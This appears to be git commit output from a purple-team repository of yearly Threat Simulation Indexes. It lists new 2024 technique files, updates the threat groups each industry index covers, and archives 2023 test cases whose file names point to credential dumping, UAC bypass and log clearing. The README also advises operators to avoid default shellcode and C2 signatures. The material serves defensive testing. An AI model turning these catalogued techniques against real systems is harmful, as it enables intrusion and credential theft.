ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml create mode 100644 ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml create mode 100644 ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml create mode 100644 ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml create mode 100644 ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml create mode 100644 ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml create mode 100644 ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml create mode 100644 ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml create mode 100644 ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml create mode 100644 ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml create mode 100644 ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml create mode 100644 ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml create mode 100644 
ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml create mode 100644 ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml create mode 100644 ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml create mode 100644 ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml create mode 100644 ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml create mode 100644 ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml create mode 100644 ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml create mode 100644 ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml create mode 100644 ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml create mode 100644 ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml create mode 100644 ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml create mode 100644 ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml create mode 100644 ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml create mode 100644 ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml create mode 100644 ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml create mode 100644 ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml create mode 100644 ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml create mode 100644 ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml create mode 100644 ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml create mode 100644 ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml create mode 100644 ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml create mode 100644 
ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml create mode 100644 rh-index-2024/CHANGELOG.md create mode 100644 rh-index-2024/REQUIREMENTS.md create mode 100644 rh-index-2024/rh-index-2024-v1.0-layer.json create mode 100644 rh-index-2024/rh-index-2024-v1.0-notebook.md create mode 100644 rh-index-2024/rh-index-2024-v1.0-summary.csv create mode 100644 rh-index-2024/rh-index-2024-v1.0.yml create mode 100644 rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml create mode 100644 rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml create mode 100644 rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml create mode 100644 rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml create mode 100644 rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml create mode 100644 rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml create mode 100644 rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml create mode 100644 
rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml create mode 100644 rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml create mode 100644 rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml create mode 100644 rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml create mode 100644 rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml create mode 100644 rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml create mode 100644 rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml create mode 100644 rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml create mode 100644 rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml create mode 100644 rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml create mode 100644 rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml create mode 100644 rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml create mode 100644 rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml create mode 100644 rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml create mode 100644 rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml create mode 100644 rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml create mode 100644 
rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml create mode 100644 rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml create mode 100644 rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml create mode 100644 rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml create mode 100644 rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml create mode 100644 rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml create mode 100644 rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml create mode 100644 rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml create mode 100644 rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml create mode 100644 rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml create mode 100644 rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml create mode 100644 rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml create mode 100644 rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml create mode 100644 rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml create mode 100644 rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml diff --git a/README.md b/README.md index 3cd0ada..57f0f6f 100644 --- a/README.md +++ b/README.md 
@@ -8,13 +8,14 @@ One of the goals of each Threat Simulation Index is to allow organizations to co
 
 Indexes are released once per year. Throughout the year, an Index may receive minor quality of life changes but will not deviate significantly from the initial release. New yearly releases start fresh and are not designed to be compatible with previous releases. Overlap between Indexes in the same industry for different years is incidental, as is overlap across industries.
 
-## 2023 Indexes
+## 2024 Indexes
 
-The following Indexes are available for 2023:
+The following Indexes are available for 2024:
 
-- [Financial Services](fs-index-2023/)
-- [Retail & Hospitality](rh-index-2023/)
-- [Health](h-index-2023/)
+- [Financial Services](fs-index-2024/)
+- [Retail & Hospitality](rh-index-2024/)
+- [Health](h-index-2024/)
+- [OT](ot-index-2024/)
 
 ### Composition
 
@@ -25,32 +26,44 @@ Expand the below section to view Index group compositions
 
 **Financial Services**
 
-- [APT28](https://attack.mitre.org/groups/G0007/)
-- [APT29](https://attack.mitre.org/groups/G0016/)
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Clop](https://attack.mitre.org/software/S0611)
+- [Lazarus](https://attack.mitre.org/groups/G0032/)
 - [APT41](https://attack.mitre.org/groups/G0096/)
-- [Bazar](https://attack.mitre.org/software/S0534/)
-- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
-- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
-- [QakBot](https://attack.mitre.org/software/S0650/)
+- SocGholish
+
 
 **Retail & Hospitality**
 
-- [APT41](https://attack.mitre.org/groups/G0096/)
-- [Conti](https://attack.mitre.org/software/S0575/)
-- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
-- [FIN7](https://attack.mitre.org/groups/G0046/)
-- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
-- [QakBot](https://attack.mitre.org/software/S0650/)
+- BianLian
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Clop](https://attack.mitre.org/software/S0611)
 
 **Health**
 
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Clop](https://attack.mitre.org/software/S0611)
 - [APT41](https://attack.mitre.org/groups/G0096/)
-- [Bazar](https://attack.mitre.org/software/S0534/)
-- [BlackTech](https://attack.mitre.org/groups/G0098/)
-- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
-- [Conti](https://attack.mitre.org/software/S0575/)
-- [Kimsuky](https://attack.mitre.org/groups/G0094/)
-- [QakBot](https://attack.mitre.org/software/S0650/)
+- SocGholish
+- [Mustang Panda](https://attack.mitre.org/groups/G0129/)
+- Dark Angels
+- BianLian
+
+**OT**
+
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Lazarus](https://attack.mitre.org/groups/G0032/)
+- [Mustang Panda](https://attack.mitre.org/groups/G0129/)
+- Dark Angels
+- [Sandworm](https://attack.mitre.org/groups/G0034)
 
 
 
@@ -72,13 +85,12 @@ Indexes can be imported directly into [VECTR](https://vectr.io) using the merged
 
 Test cases are based on MITRE-tracked intelligence and the general process for determining test cases for inclusion is as follows:
 
-1. Identify initial list of groups with principal members
-2. Map groups to MITRE-tracked groups and filter out non-MITRE groups
-3. Review intelligence report for each group
- 1. Remove anything produced before the look-back period of two years
+1. Identify initial list of groups and TTPs with principal members
+2. Collect then review intelligence report for each group
+ 1. Remove anything produced before the look-back period of one year
 2. Remove reports that do not provide enough information for simulation purposes
 3. Cut groups lacking intelligence
-4. Extract TTP information from intelligence reports then develop full test cases for each
+3. Extract TTP information from intelligence reports then develop full test cases for each
 1. Exclude TTPs that likely do not act as worthwhile simulation candidates
-5. Filter out items from list to balance plan composition
+4. Filter out items from list to balance plan composition
 
diff --git a/archived/2023/README.md b/archived/2023/README.md
new file mode 100644
index 0000000..3cd0ada
--- /dev/null
+++ b/archived/2023/README.md
@@ -0,0 +1,84 @@
+# Threat Simulation Indexes
+
+Each Threat Simulation Index is a curated list of test cases derived from the threat groups of interest for members of a given industry using MITRE-tracked intelligence. Security Risk Advisors (SRA) collaborates with experts in threat intelligence and cyber defense at targeted organizations to identify priorities for defense testing.
+
+One of the goals of each Threat Simulation Index is to allow organizations to compare objective defense scores against peers. Visit the [Defense Success Metric blog post on SRA.io](https://sra.io/blog/the-road-to-benchmarked-mitre-attck-alignment-defense-success-metrics/) for more information.
+
+### Release Cycle
+
+Indexes are released once per year. Throughout the year, an Index may receive minor quality of life changes but will not deviate significantly from the initial release. New yearly releases start fresh and are not designed to be compatible with previous releases. Overlap between Indexes in the same industry for different years is incidental, as is overlap across industries.
+
+## 2023 Indexes
+
+The following Indexes are available for 2023:
+
+- [Financial Services](fs-index-2023/)
+- [Retail & Hospitality](rh-index-2023/)
+- [Health](h-index-2023/)
+
+### Composition
+
+Expand the below section to view Index group compositions
+
+ Expand
+
+**Financial Services**
+
+- [APT28](https://attack.mitre.org/groups/G0007/)
+- [APT29](https://attack.mitre.org/groups/G0016/)
+- [APT41](https://attack.mitre.org/groups/G0096/)
+- [Bazar](https://attack.mitre.org/software/S0534/)
+- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
+- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
+- [QakBot](https://attack.mitre.org/software/S0650/)
+
+**Retail & Hospitality**
+
+- [APT41](https://attack.mitre.org/groups/G0096/)
+- [Conti](https://attack.mitre.org/software/S0575/)
+- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
+- [FIN7](https://attack.mitre.org/groups/G0046/)
+- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
+- [QakBot](https://attack.mitre.org/software/S0650/)
+
+**Health**
+
+- [APT41](https://attack.mitre.org/groups/G0096/)
+- [Bazar](https://attack.mitre.org/software/S0534/)
+- [BlackTech](https://attack.mitre.org/groups/G0098/)
+- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
+- [Conti](https://attack.mitre.org/software/S0575/)
+- [Kimsuky](https://attack.mitre.org/groups/G0094/)
+- [QakBot](https://attack.mitre.org/software/S0650/)
+
+
+## Intent & Use
+
+Indexes are designed to be used by human operators as part of simulated attack scenarios such as purple teams. Operators should have general familiarity with attacker techniques, payload generation, and infrastructure management.
+
+Individual Index requirements can be found in that Index's folder in the REQUIREMENTS.md file.
+
+Indexes can be imported directly into [VECTR](https://vectr.io) using the merged YAML document for that Index.
+
+### Additional Notes
+
+- Operators are free to use their payload generation procedures of choice as long as the resulting payload(s) complies with the general description provided by the test case and its associated documentation.
+- Where possible, Operators should avoid using default settings for their tools. This includes, but is not limited to: shellcode, C2 traffic signatures, and default artifacts
+- Some test cases can be performed through alternative execution methods. However, Operators should exercise caution in methods that produce significantly different detection artifacts for the core behaviors. For example, executing a .NET payload via an `execute-assembly` style harness is generally acceptable whereas substituting one credential dumping method for another should be avoided.
+
+## Development Process
+
+Test cases are based on MITRE-tracked intelligence and the general process for determining test cases for inclusion is as follows:
+
+1. Identify initial list of groups with principal members
+2. Map groups to MITRE-tracked groups and filter out non-MITRE groups
+3. Review intelligence report for each group
+ 1. Remove anything produced before the look-back period of two years
+ 2. Remove reports that do not provide enough information for simulation purposes
+ 3. Cut groups lacking intelligence
+4. Extract TTP information from intelligence reports then develop full test cases for each
+ 1. Exclude TTPs that likely do not act as worthwhile simulation candidates
+5.
Filter out items from list to balance plan composition
+
diff --git a/fs-index-2023/CHANGELOG.md b/archived/2023/fs-index-2023/CHANGELOG.md
similarity index 100%
rename from fs-index-2023/CHANGELOG.md
rename to archived/2023/fs-index-2023/CHANGELOG.md
diff --git a/fs-index-2023/NOTEBOOK.md b/archived/2023/fs-index-2023/NOTEBOOK.md
similarity index 100%
rename from fs-index-2023/NOTEBOOK.md
rename to archived/2023/fs-index-2023/NOTEBOOK.md
diff --git a/fs-index-2023/REQUIREMENTS.md b/archived/2023/fs-index-2023/REQUIREMENTS.md
similarity index 100%
rename from fs-index-2023/REQUIREMENTS.md
rename to archived/2023/fs-index-2023/REQUIREMENTS.md
diff --git a/fs-index-2023/fs-index-2023-v1.2-summary.csv b/archived/2023/fs-index-2023/fs-index-2023-v1.2-summary.csv
similarity index 100%
rename from fs-index-2023/fs-index-2023-v1.2-summary.csv
rename to archived/2023/fs-index-2023/fs-index-2023-v1.2-summary.csv
diff --git a/fs-index-2023/fs-index-2023-v1.2.yml b/archived/2023/fs-index-2023/fs-index-2023-v1.2.yml
similarity index 100%
rename from fs-index-2023/fs-index-2023-v1.2.yml
rename to archived/2023/fs-index-2023/fs-index-2023-v1.2.yml
diff --git a/fs-index-2023/navigator.json b/archived/2023/fs-index-2023/navigator.json
similarity index 100%
rename from fs-index-2023/navigator.json
rename to archived/2023/fs-index-2023/navigator.json
diff --git a/fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml b/archived/2023/fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
rename to archived/2023/fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
